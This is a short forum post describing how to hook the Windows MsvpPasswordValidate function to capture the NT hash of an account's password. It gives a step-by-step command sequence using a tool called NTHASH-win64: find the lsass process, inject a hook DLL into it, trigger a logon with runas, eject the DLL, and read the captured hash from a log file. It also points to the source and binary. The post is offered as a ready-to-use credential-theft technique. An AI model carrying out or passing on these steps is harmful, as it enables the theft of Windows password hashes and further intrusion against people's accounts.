Jump to content











Photo

Hook MsvpPasswordValidate and retrieve the NT hash of an account


  • Please log in to reply
No replies to this topic

#1 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2904 posts
  • Location:Nantes - France
  •  
    France

Posted 4 weeks ago

Hook MsvpPasswordValidate, enter any password (correct or not) and intercept the NT hash of the user's password.

How to proceed:
 

  • Lets retrieve the pid of lsass : nthash-win64 /enumproc | findstr lsass
  • NTHASH-win64.exe /inject /pid:808 /binary:c:\temp\hook-win64.dll
  • optionally, check that our dll as been injected : NTHASH-win64.exe /enummod /pid:808 | findstr hook
  • test runas /user:Admin cmd 
  • NTHASH-win64.exe /eject /pid:808 /binary:hook-win64.dll
  • optionally, check that our dll as been ejected : NTHASH-win64.exe /enummod /pid:808 | findstr hook
  • check c:\log.txt and obtain the (correct) hash of the user you targeted

 

Source code and binary here.


  • Olof Lagerkvist likes this




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users